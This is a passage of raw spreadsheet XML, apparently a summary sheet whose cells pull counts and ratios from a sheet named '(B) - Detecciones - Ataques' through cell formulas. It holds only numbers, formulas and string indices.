      </c>
      <c r="H110" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ104</f>
        <v>0</v>
      </c>
      <c r="I110" s="271">
        <f>'(B) - Detecciones - Ataques'!AS104</f>
        <v>0</v>
      </c>
      <c r="J110" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ104</f>
        <v>0</v>
      </c>
      <c r="K110" s="271">
        <f>'(B) - Detecciones - Ataques'!BP104</f>
        <v>0</v>
      </c>
      <c r="L110" s="281">
        <f>'(B) - Detecciones - Ataques'!BW104</f>
        <v>0</v>
      </c>
      <c r="M110" s="271">
        <f>'(B) - Detecciones - Ataques'!CM104</f>
        <v>0</v>
      </c>
      <c r="N110" s="281">
        <f>'(B) - Detecciones - Ataques'!CT104</f>
        <v>0</v>
      </c>
      <c r="O110" s="280">
        <f>'(B) - Detecciones - Ataques'!EC104</f>
        <v>0</v>
      </c>
      <c r="P110" s="281">
        <f>'(B) - Detecciones - Ataques'!ED104</f>
        <v>0</v>
      </c>
      <c r="Q110" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM110" s="299"/>
      <c r="AN110" s="299"/>
      <c r="AO110" s="298"/>
      <c r="AP110" s="299"/>
      <c r="AQ110" s="298"/>
    </row>
    <row r="111" ht="60.0" customHeight="1">
      <c r="B111" s="142" t="s">
        <v>397</v>
      </c>
      <c r="C111" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D111" s="143" t="s">
        <v>1089</v>
      </c>
      <c r="E111" s="145" t="s">
        <v>1525</v>
      </c>
      <c r="F111" s="280">
        <f>'(B) - Detecciones - Ataques'!P105</f>
        <v>1</v>
      </c>
      <c r="G111" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ105</f>
        <v>0</v>
      </c>
      <c r="H111" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ105</f>
        <v>0</v>
      </c>
      <c r="I111" s="271">
        <f>'(B) - Detecciones - Ataques'!AS105</f>
        <v>0</v>
      </c>
      <c r="J111" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ105</f>
        <v>0</v>
      </c>
      <c r="K111" s="271">
        <f>'(B) - Detecciones - Ataques'!BP105</f>
        <v>0</v>
      </c>
      <c r="L111" s="281">
        <f>'(B) - Detecciones - Ataques'!BW105</f>
        <v>0</v>
      </c>
      <c r="M111" s="271">
        <f>'(B) - Detecciones - Ataques'!CM105</f>
        <v>0</v>
      </c>
      <c r="N111" s="281">
        <f>'(B) - Detecciones - Ataques'!CT105</f>
        <v>0</v>
      </c>
      <c r="O111" s="280">
        <f>'(B) - Detecciones - Ataques'!EC105</f>
        <v>0</v>
      </c>
      <c r="P111" s="281">
        <f>'(B) - Detecciones - Ataques'!ED105</f>
        <v>0</v>
      </c>
      <c r="Q111" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL111" s="302"/>
      <c r="AM111" s="299"/>
      <c r="AN111" s="299"/>
      <c r="AO111" s="298"/>
      <c r="AP111" s="299"/>
      <c r="AQ111" s="298"/>
    </row>
    <row r="112" ht="60.0" customHeight="1">
      <c r="B112" s="142" t="s">
        <v>1099</v>
      </c>
      <c r="C112" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D112" s="143" t="s">
        <v>1110</v>
      </c>
      <c r="E112" s="145" t="s">
        <v>1113</v>
      </c>
      <c r="F112" s="280">
        <f>'(B) - Detecciones - Ataques'!P108</f>
        <v>1</v>
      </c>
      <c r="G112" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ108</f>
        <v>1</v>
      </c>
      <c r="H112" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ108</f>
        <v>1</v>
      </c>
      <c r="I112" s="271">
        <f>'(B) - Detecciones - Ataques'!AS108</f>
        <v>1</v>
      </c>
      <c r="J112" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ108</f>
        <v>1</v>
      </c>
      <c r="K112" s="271">
        <f>'(B) - Detecciones - Ataques'!BP108</f>
        <v>1</v>
      </c>
      <c r="L112" s="281">
        <f>'(B) - Detecciones - Ataques'!BW108</f>
        <v>1</v>
      </c>
      <c r="M112" s="271">
        <f>'(B) - Detecciones - Ataques'!CM108</f>
        <v>1</v>
      </c>
      <c r="N112" s="281">
        <f>'(B) - Detecciones - Ataques'!CT108</f>
        <v>1</v>
      </c>
      <c r="O112" s="280">
        <f>'(B) - Detecciones - Ataques'!EC108</f>
        <v>1</v>
      </c>
      <c r="P112" s="281">
        <f>'(B) - Detecciones - Ataques'!ED108</f>
        <v>1</v>
      </c>
      <c r="Q112" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL112" s="302"/>
      <c r="AM112" s="299"/>
      <c r="AN112" s="299"/>
      <c r="AO112" s="298"/>
      <c r="AP112" s="299"/>
      <c r="AQ112" s="298"/>
    </row>
    <row r="113" ht="60.0" customHeight="1">
      <c r="B113" s="142" t="s">
        <v>1099</v>
      </c>
      <c r="C113" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D113" s="143" t="s">
        <v>1110</v>
      </c>
      <c r="E113" s="145" t="s">
        <v>1126</v>
      </c>
      <c r="F113" s="280">
        <f>'(B) - Detecciones - Ataques'!P109</f>
        <v>1</v>
      </c>
      <c r="G113" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ109</f>
        <v>0</v>
      </c>
      <c r="H113" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ109</f>
        <v>0</v>
      </c>
      <c r="I113" s="271">
        <f>'(B) - Detecciones - Ataques'!AS109</f>
        <v>0</v>
      </c>
      <c r="J113" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ109</f>
        <v>0</v>
      </c>
      <c r="K113" s="271">
        <f>'(B) - Detecciones - Ataques'!BP109</f>
        <v>0</v>
      </c>
      <c r="L113" s="281">
        <f>'(B) - Detecciones - Ataques'!BW109</f>
        <v>0</v>
      </c>
      <c r="M113" s="271">
        <f>'(B) - Detecciones - Ataques'!CM109</f>
        <v>0</v>
      </c>
      <c r="N113" s="281">
        <f>'(B) - Detecciones - Ataques'!CT109</f>
        <v>0</v>
      </c>
      <c r="O113" s="280">
        <f>'(B) - Detecciones - Ataques'!EC109</f>
        <v>0</v>
      </c>
      <c r="P113" s="281">
        <f>'(B) - Detecciones - Ataques'!ED109</f>
        <v>0</v>
      </c>
      <c r="Q113" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM113" s="299"/>
      <c r="AN113" s="299"/>
      <c r="AO113" s="298"/>
      <c r="AP113" s="299"/>
      <c r="AQ113" s="298"/>
    </row>
    <row r="114" ht="60.0" customHeight="1">
      <c r="B114" s="142" t="s">
        <v>1099</v>
      </c>
      <c r="C114" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D114" s="143" t="s">
        <v>1110</v>
      </c>
      <c r="E114" s="145" t="s">
        <v>1129</v>
      </c>
      <c r="F114" s="280">
        <f>'(B) - Detecciones - Ataques'!P110</f>
        <v>1</v>
      </c>
      <c r="G114" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ110</f>
        <v>1</v>
      </c>
      <c r="H114" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ110</f>
        <v>1</v>
      </c>
      <c r="I114" s="271">
        <f>'(B) - Detecciones - Ataques'!AS110</f>
        <v>0</v>
      </c>
      <c r="J114" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ110</f>
        <v>0</v>
      </c>
      <c r="K114" s="271">
        <f>'(B) - Detecciones - Ataques'!BP110</f>
        <v>0</v>
      </c>
      <c r="L114" s="281">
        <f>'(B) - Detecciones - Ataques'!BW110</f>
        <v>0</v>
      </c>
      <c r="M114" s="271">
        <f>'(B) - Detecciones - Ataques'!CM110</f>
        <v>1</v>
      </c>
      <c r="N114" s="281">
        <f>'(B) - Detecciones - Ataques'!CT110</f>
        <v>1</v>
      </c>
      <c r="O114" s="280">
        <f>'(B) - Detecciones - Ataques'!EC110</f>
        <v>1</v>
      </c>
      <c r="P114" s="281">
        <f>'(B) - Detecciones - Ataques'!ED110</f>
        <v>1</v>
      </c>
      <c r="Q114" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM114" s="299"/>
      <c r="AN114" s="299"/>
      <c r="AO114" s="298"/>
      <c r="AP114" s="299"/>
      <c r="AQ114" s="298"/>
    </row>
    <row r="115" ht="60.0" customHeight="1">
      <c r="B115" s="142" t="s">
        <v>1099</v>
      </c>
      <c r="C115" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D115" s="143" t="s">
        <v>1139</v>
      </c>
      <c r="E115" s="145" t="s">
        <v>1145</v>
      </c>
      <c r="F115" s="280">
        <f>'(B) - Detecciones - Ataques'!P111</f>
        <v>1</v>
      </c>
      <c r="G115" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ111</f>
        <v>1</v>
      </c>
      <c r="H115" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ111</f>
        <v>1</v>
      </c>
      <c r="I115" s="271">
        <f>'(B) - Detecciones - Ataques'!AS111</f>
        <v>1</v>
      </c>
      <c r="J115" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ111</f>
        <v>1</v>
      </c>
      <c r="K115" s="271">
        <f>'(B) - Detecciones - Ataques'!BP111</f>
        <v>1</v>
      </c>
      <c r="L115" s="281">
        <f>'(B) - Detecciones - Ataques'!BW111</f>
        <v>1</v>
      </c>
      <c r="M115" s="271">
        <f>'(B) - Detecciones - Ataques'!CM111</f>
        <v>1</v>
      </c>
      <c r="N115" s="281">
        <f>'(B) - Detecciones - Ataques'!CT111</f>
        <v>1</v>
      </c>
      <c r="O115" s="280">
        <f>'(B) - Detecciones - Ataques'!EC111</f>
        <v>0</v>
      </c>
      <c r="P115" s="281">
        <f>'(B) - Detecciones - Ataques'!ED111</f>
        <v>0</v>
      </c>
      <c r="Q115" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM115" s="299"/>
      <c r="AN115" s="299"/>
      <c r="AO115" s="298"/>
      <c r="AP115" s="299"/>
      <c r="AQ115" s="298"/>
    </row>
    <row r="116" ht="60.0" customHeight="1">
      <c r="B116" s="142" t="s">
        <v>1099</v>
      </c>
      <c r="C116" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D116" s="143" t="s">
        <v>1150</v>
      </c>
      <c r="E116" s="145" t="s">
        <v>1153</v>
      </c>
      <c r="F116" s="280">
        <f>'(B) - Detecciones - Ataques'!P112</f>
        <v>1</v>
      </c>
      <c r="G116" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ112</f>
        <v>0</v>
      </c>
      <c r="H116" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ112</f>
        <v>0</v>
      </c>
      <c r="I116" s="271">
        <f>'(B) - Detecciones - Ataques'!AS112</f>
        <v>0</v>
      </c>
      <c r="J116" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ112</f>
        <v>0</v>
      </c>
      <c r="K116" s="271">
        <f>'(B) - Detecciones - Ataques'!BP112</f>
        <v>0</v>
      </c>
      <c r="L116" s="281">
        <f>'(B) - Detecciones - Ataques'!BW112</f>
        <v>0</v>
      </c>
      <c r="M116" s="271">
        <f>'(B) - Detecciones - Ataques'!CM112</f>
        <v>0</v>
      </c>
      <c r="N116" s="281">
        <f>'(B) - Detecciones - Ataques'!CT112</f>
        <v>0</v>
      </c>
      <c r="O116" s="280">
        <f>'(B) - Detecciones - Ataques'!EC112</f>
        <v>1</v>
      </c>
      <c r="P116" s="281">
        <f>'(B) - Detecciones - Ataques'!ED112</f>
        <v>1</v>
      </c>
      <c r="Q116" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM116" s="299"/>
      <c r="AN116" s="299"/>
      <c r="AO116" s="298"/>
      <c r="AP116" s="299"/>
      <c r="AQ116" s="298"/>
    </row>
    <row r="117" ht="60.0" customHeight="1">
      <c r="B117" s="142" t="s">
        <v>1099</v>
      </c>
      <c r="C117" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D117" s="143" t="s">
        <v>1156</v>
      </c>
      <c r="E117" s="145" t="s">
        <v>1160</v>
      </c>
      <c r="F117" s="280">
        <f>'(B) - Detecciones - Ataques'!P113</f>
        <v>1</v>
      </c>
      <c r="G117" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ113</f>
        <v>0</v>
      </c>
      <c r="H117" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ113</f>
        <v>0</v>
      </c>
      <c r="I117" s="271">
        <f>'(B) - Detecciones - Ataques'!AS113</f>
        <v>0</v>
      </c>
      <c r="J117" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ113</f>
        <v>0</v>
      </c>
      <c r="K117" s="271">
        <f>'(B) - Detecciones - Ataques'!BP113</f>
        <v>0</v>
      </c>
      <c r="L117" s="281">
        <f>'(B) - Detecciones - Ataques'!BW113</f>
        <v>0</v>
      </c>
      <c r="M117" s="271">
        <f>'(B) - Detecciones - Ataques'!CM113</f>
        <v>0</v>
      </c>
      <c r="N117" s="281">
        <f>'(B) - Detecciones - Ataques'!CT113</f>
        <v>0</v>
      </c>
      <c r="O117" s="280">
        <f>'(B) - Detecciones - Ataques'!EC113</f>
        <v>0</v>
      </c>
      <c r="P117" s="281">
        <f>'(B) - Detecciones - Ataques'!ED113</f>
        <v>0</v>
      </c>
      <c r="Q117" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL117" s="302"/>
      <c r="AM117" s="299"/>
      <c r="AN117" s="299"/>
      <c r="AO117" s="298"/>
      <c r="AP117" s="299"/>
      <c r="AQ117" s="298"/>
    </row>
    <row r="118" ht="60.0" customHeight="1">
      <c r="B118" s="142" t="s">
        <v>505</v>
      </c>
      <c r="C118" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D118" s="143" t="s">
        <v>1166</v>
      </c>
      <c r="E118" s="145" t="s">
        <v>1170</v>
      </c>
      <c r="F118" s="280">
        <f>'(B) - Detecciones - Ataques'!P114</f>
        <v>6293</v>
      </c>
      <c r="G118" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ114</f>
        <v>73</v>
      </c>
      <c r="H118" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ114</f>
        <v>0.01160019069</v>
      </c>
      <c r="I118" s="271">
        <f>'(B) - Detecciones - Ataques'!AS114</f>
        <v>0</v>
      </c>
      <c r="J118" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ114</f>
        <v>0</v>
      </c>
      <c r="K118" s="271">
        <f>'(B) - Detecciones - Ataques'!BP114</f>
        <v>48</v>
      </c>
      <c r="L118" s="281">
        <f>'(B) - Detecciones - Ataques'!BW114</f>
        <v>0.007627522644</v>
      </c>
      <c r="M118" s="271">
        <f>'(B) - Detecciones - Ataques'!CM114</f>
        <v>48</v>
      </c>
      <c r="N118" s="281">
        <f>'(B) - Detecciones - Ataques'!CT114</f>
        <v>0.007627522644</v>
      </c>
      <c r="O118" s="280">
        <f>'(B) - Detecciones - Ataques'!EC114</f>
        <v>208</v>
      </c>
      <c r="P118" s="281">
        <f>'(B) - Detecciones - Ataques'!ED114</f>
        <v>0.03305259812</v>
      </c>
      <c r="Q118" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL118" s="302"/>
      <c r="AM118" s="299"/>
      <c r="AN118" s="299"/>
      <c r="AO118" s="298"/>
      <c r="AP118" s="299"/>
      <c r="AQ118" s="298"/>
    </row>
    <row r="119" ht="60.0" customHeight="1">
      <c r="B119" s="142" t="s">
        <v>505</v>
      </c>
      <c r="C119" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D119" s="143" t="s">
        <v>1166</v>
      </c>
      <c r="E119" s="145" t="s">
        <v>1183</v>
      </c>
      <c r="F119" s="280">
        <f>'(B) - Detecciones - Ataques'!P115</f>
        <v>65737</v>
      </c>
      <c r="G119" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ115</f>
        <v>51</v>
      </c>
      <c r="H119" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ115</f>
        <v>0.0007758187931</v>
      </c>
      <c r="I119" s="271">
        <f>'(B) - Detecciones - Ataques'!AS115</f>
        <v>3</v>
      </c>
      <c r="J119" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ115</f>
        <v>0.00004563639959</v>
      </c>
      <c r="K119" s="271">
        <f>'(B) - Detecciones - Ataques'!BP115</f>
        <v>49</v>
      </c>
      <c r="L119" s="281">
        <f>'(B) - Detecciones - Ataques'!BW115</f>
        <v>0.0007453945267</v>
      </c>
      <c r="M119" s="271">
        <f>'(B) - Detecciones - Ataques'!CM115</f>
        <v>49</v>
      </c>
      <c r="N119" s="281">
        <f>'(B) - Detecciones - Ataques'!CT115</f>
        <v>0.0007453945267</v>
      </c>
      <c r="O119" s="280">
        <f>'(B) - Detecciones - Ataques'!EC115</f>
        <v>4</v>
      </c>
      <c r="P119" s="281">
        <f>'(B) - Detecciones - Ataques'!ED115</f>
        <v>0.00006084853279</v>
      </c>
      <c r="Q119" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM119" s="299"/>
      <c r="AN119" s="299"/>
      <c r="AO119" s="298"/>
      <c r="AP119" s="299"/>
      <c r="AQ119" s="298"/>
    </row>
    <row r="120" ht="60.0" customHeight="1">
      <c r="B120" s="142" t="s">
        <v>505</v>
      </c>
      <c r="C120" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D120" s="143" t="s">
        <v>1166</v>
      </c>
      <c r="E120" s="145" t="s">
        <v>1196</v>
      </c>
      <c r="F120" s="280">
        <f>'(B) - Detecciones - Ataques'!P116</f>
        <v>1</v>
      </c>
      <c r="G120" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ116</f>
        <v>1</v>
      </c>
      <c r="H120" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ116</f>
        <v>1</v>
      </c>
      <c r="I120" s="271">
        <f>'(B) - Detecciones - Ataques'!AS116</f>
        <v>0</v>
      </c>
      <c r="J120" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ116</f>
        <v>0</v>
      </c>
      <c r="K120" s="271">
        <f>'(B) - Detecciones - Ataques'!BP116</f>
        <v>0</v>
      </c>
      <c r="L120" s="281">
        <f>'(B) - Detecciones - Ataques'!BW116</f>
        <v>0</v>
      </c>
      <c r="M120" s="271">
        <f>'(B) - Detecciones - Ataques'!CM116</f>
        <v>0</v>
      </c>
      <c r="N120" s="281">
        <f>'(B) - Detecciones - Ataques'!CT116</f>
        <v>0</v>
      </c>
      <c r="O120" s="280">
        <f>'(B) - Detecciones - Ataques'!EC116</f>
        <v>1</v>
      </c>
      <c r="P120" s="281">
        <f>'(B) - Detecciones - Ataques'!ED116</f>
        <v>1</v>
      </c>
      <c r="Q120" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM120" s="299"/>
      <c r="AN120" s="299"/>
      <c r="AO120" s="298"/>
      <c r="AP120" s="299"/>
      <c r="AQ120" s="298"/>
    </row>
    <row r="121" ht="60.0" customHeight="1">
      <c r="B121" s="142" t="s">
        <v>505</v>
      </c>
      <c r="C121" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D121" s="143" t="s">
        <v>1202</v>
      </c>
      <c r="E121" s="145" t="s">
        <v>1205</v>
      </c>
      <c r="F121" s="280">
        <f>'(B) - Detecciones - Ataques'!P117</f>
        <v>1002</v>
      </c>
      <c r="G121" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ117</f>
        <v>44</v>
      </c>
      <c r="H121" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ117</f>
        <v>0.04391217565</v>
      </c>
      <c r="I121" s="271">
        <f>'(B) - Detecciones - Ataques'!AS117</f>
        <v>0</v>
      </c>
      <c r="J121" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ117</f>
        <v>0</v>
      </c>
      <c r="K121" s="271">
        <f>'(B) - Detecciones - Ataques'!BP117</f>
        <v>44</v>
      </c>
      <c r="L121" s="281">
        <f>'(B) - Detecciones - Ataques'!BW117</f>
        <v>0.04391217565</v>
      </c>
      <c r="M121" s="271">
        <f>'(B) - Detecciones - Ataques'!CM117</f>
        <v>44</v>
      </c>
      <c r="N121" s="281">
        <f>'(B) - Detecciones - Ataques'!CT117</f>
        <v>0.04391217565</v>
      </c>
      <c r="O121" s="280">
        <f>'(B) - Detecciones - Ataques'!EC117</f>
        <v>6</v>
      </c>
      <c r="P121" s="281">
        <f>'(B) - Detecciones - Ataques'!ED117</f>
        <v>0.005988023952</v>
      </c>
      <c r="Q121" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM121" s="299"/>
      <c r="AN121" s="299"/>
      <c r="AO121" s="298"/>
      <c r="AP121" s="299"/>
      <c r="AQ121" s="298"/>
    </row>
    <row r="122" ht="60.0" customHeight="1">
      <c r="B122" s="142" t="s">
        <v>505</v>
      </c>
      <c r="C122" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D122" s="143" t="s">
        <v>1217</v>
      </c>
      <c r="E122" s="145" t="s">
        <v>1220</v>
      </c>
      <c r="F122" s="280">
        <f>'(B) - Detecciones - Ataques'!P118</f>
        <v>41</v>
      </c>
      <c r="G122" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ118</f>
        <v>0</v>
      </c>
      <c r="H122" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ118</f>
        <v>0</v>
      </c>
      <c r="I122" s="271">
        <f>'(B) - Detecciones - Ataques'!AS118</f>
        <v>0</v>
      </c>
      <c r="J122" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ118</f>
        <v>0</v>
      </c>
      <c r="K122" s="271">
        <f>'(B) - Detecciones - Ataques'!BP118</f>
        <v>0</v>
      </c>
      <c r="L122" s="281">
        <f>'(B) - Detecciones - Ataques'!BW118</f>
        <v>0</v>
      </c>
      <c r="M122" s="271">
        <f>'(B) - Detecciones - Ataques'!CM118</f>
        <v>0</v>
      </c>
      <c r="N122" s="281">
        <f>'(B) - Detecciones - Ataques'!CT118</f>
        <v>0</v>
      </c>
      <c r="O122" s="280">
        <f>'(B) - Detecciones - Ataques'!EC118</f>
        <v>0</v>
      </c>
      <c r="P122" s="281">
        <f>'(B) - Detecciones - Ataques'!ED118</f>
        <v>0</v>
      </c>
      <c r="Q122" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM122" s="299"/>
      <c r="AN122" s="299"/>
      <c r="AO122" s="298"/>
      <c r="AP122" s="299"/>
      <c r="AQ122" s="298"/>
    </row>
    <row r="123" ht="60.0" customHeight="1">
      <c r="B123" s="142" t="s">
        <v>505</v>
      </c>
      <c r="C123" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D123" s="143" t="s">
        <v>1225</v>
      </c>
      <c r="E123" s="145" t="s">
        <v>1229</v>
      </c>
      <c r="F123" s="280">
        <f>'(B) - Detecciones - Ataques'!P119</f>
        <v>1</v>
      </c>
      <c r="G123" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ119</f>
        <v>0</v>
      </c>
      <c r="H123" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ119</f>
        <v>0</v>
      </c>
      <c r="I123" s="271">
        <f>'(B) - Detecciones - Ataques'!AS119</f>
        <v>0</v>
      </c>
      <c r="J123" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ119</f>
        <v>0</v>
      </c>
      <c r="K123" s="271">
        <f>'(B) - Detecciones - Ataques'!BP119</f>
        <v>0</v>
      </c>
      <c r="L123" s="281">
        <f>'(B) - Detecciones - Ataques'!BW119</f>
        <v>0</v>
      </c>
      <c r="M123" s="271">
        <f>'(B) - Detecciones - Ataques'!CM119</f>
        <v>0</v>
      </c>
      <c r="N123" s="281">
        <f>'(B) - Detecciones - Ataques'!CT119</f>
        <v>0</v>
      </c>
      <c r="O123" s="280">
        <f>'(B) - Detecciones - Ataques'!EC119</f>
        <v>0</v>
      </c>
      <c r="P123" s="281">
        <f>'(B) - Detecciones - Ataques'!ED119</f>
        <v>0</v>
      </c>
      <c r="Q123" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM123" s="299"/>
      <c r="AN123" s="299"/>
      <c r="AO123" s="298"/>
      <c r="AP123" s="299"/>
      <c r="AQ123" s="298"/>
    </row>
    <row r="124" ht="60.0" customHeight="1">
      <c r="B124" s="142" t="s">
        <v>505</v>
      </c>
      <c r="C124" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D124" s="143" t="s">
        <v>1236</v>
      </c>
      <c r="E124" s="145" t="s">
        <v>1240</v>
      </c>
      <c r="F124" s="280">
        <f>'(B) - Detecciones - Ataques'!P120</f>
        <v>1</v>
      </c>
      <c r="G124" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ120</f>
        <v>0</v>
      </c>
      <c r="H124" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ120</f>
        <v>0</v>
      </c>
      <c r="I124" s="271">
        <f>'(B) - Detecciones - Ataques'!AS120</f>
        <v>0</v>
      </c>
      <c r="J124" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ120</f>
        <v>0</v>
      </c>
      <c r="K124" s="271">
        <f>'(B) - Detecciones - Ataques'!BP120</f>
        <v>0</v>
      </c>
      <c r="L124" s="281">
        <f>'(B) - Detecciones - Ataques'!BW120</f>
        <v>0</v>
      </c>
      <c r="M124" s="271">
        <f>'(B) - Detecciones - Ataques'!CM120</f>
        <v>0</v>
      </c>
      <c r="N124" s="281">
        <f>'(B) - Detecciones - Ataques'!CT120</f>
        <v>0</v>
      </c>
      <c r="O124" s="280">
        <f>'(B) - Detecciones - Ataques'!EC120</f>
        <v>0</v>
      </c>
      <c r="P124" s="281">
        <f>'(B) - Detecciones - Ataques'!ED120</f>
        <v>0</v>
      </c>
      <c r="Q124" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL124" s="302"/>
      <c r="AM124" s="299"/>
      <c r="AN124" s="299"/>
      <c r="AO124" s="298"/>
      <c r="AP124" s="299"/>
      <c r="AQ124" s="298"/>
    </row>
    <row r="125" ht="60.0" customHeight="1">
      <c r="B125" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C125" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D125" s="143" t="s">
        <v>1247</v>
      </c>
      <c r="E125" s="145" t="s">
        <v>1252</v>
      </c>
      <c r="F125" s="280">
        <f>'(B) - Detecciones - Ataques'!P121</f>
        <v>16</v>
      </c>
      <c r="G125" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ121</f>
        <v>16</v>
      </c>
      <c r="H125" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ121</f>
        <v>1</v>
      </c>
      <c r="I125" s="271">
        <f>'(B) - Detecciones - Ataques'!AS121</f>
        <v>16</v>
      </c>
      <c r="J125" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ121</f>
        <v>1</v>
      </c>
      <c r="K125" s="271">
        <f>'(B) - Detecciones - Ataques'!BP121</f>
        <v>16</v>
      </c>
      <c r="L125" s="281">
        <f>'(B) - Detecciones - Ataques'!BW121</f>
        <v>1</v>
      </c>
      <c r="M125" s="271">
        <f>'(B) - Detecciones - Ataques'!CM121</f>
        <v>16</v>
      </c>
      <c r="N125" s="281">
        <f>'(B) - Detecciones - Ataques'!CT121</f>
        <v>1</v>
      </c>
      <c r="O125" s="280">
        <f>'(B) - Detecciones - Ataques'!EC121</f>
        <v>0</v>
      </c>
      <c r="P125" s="281">
        <f>'(B) - Detecciones - Ataques'!ED121</f>
        <v>0</v>
      </c>
      <c r="Q125" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM125" s="299"/>
      <c r="AN125" s="299"/>
      <c r="AO125" s="298"/>
      <c r="AP125" s="299"/>
      <c r="AQ125" s="298"/>
    </row>
    <row r="126" ht="60.0" customHeight="1">
      <c r="B126" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C126" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D126" s="143" t="s">
        <v>1247</v>
      </c>
      <c r="E126" s="145" t="s">
        <v>1270</v>
      </c>
      <c r="F126" s="280">
        <f>'(B) - Detecciones - Ataques'!P122</f>
        <v>1</v>
      </c>
      <c r="G126" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ122</f>
        <v>1</v>
      </c>
      <c r="H126" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ122</f>
        <v>1</v>
      </c>
      <c r="I126" s="271">
        <f>'(B) - Detecciones - Ataques'!AS122</f>
        <v>0</v>
      </c>
      <c r="J126" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ122</f>
        <v>0</v>
      </c>
      <c r="K126" s="271">
        <f>'(B) - Detecciones - Ataques'!BP122</f>
        <v>0</v>
      </c>
      <c r="L126" s="281">
        <f>'(B) - Detecciones - Ataques'!BW122</f>
        <v>0</v>
      </c>
      <c r="M126" s="271">
        <f>'(B) - Detecciones - Ataques'!CM122</f>
        <v>0</v>
      </c>
      <c r="N126" s="281">
        <f>'(B) - Detecciones - Ataques'!CT122</f>
        <v>0</v>
      </c>
      <c r="O126" s="280">
        <f>'(B) - Detecciones - Ataques'!EC122</f>
        <v>0</v>
      </c>
      <c r="P126" s="281">
        <f>'(B) - Detecciones - Ataques'!ED122</f>
        <v>0</v>
      </c>
      <c r="Q126" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM126" s="299"/>
      <c r="AN126" s="299"/>
      <c r="AO126" s="298"/>
      <c r="AP126" s="299"/>
      <c r="AQ126" s="298"/>
    </row>
    <row r="127" ht="60.0" customHeight="1">
      <c r="B127" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C127" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D127" s="143" t="s">
        <v>1278</v>
      </c>
      <c r="E127" s="145" t="s">
        <v>1284</v>
      </c>
      <c r="F127" s="280">
        <f>'(B) - Detecciones - Ataques'!P123</f>
        <v>1</v>
      </c>
      <c r="G127" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ123</f>
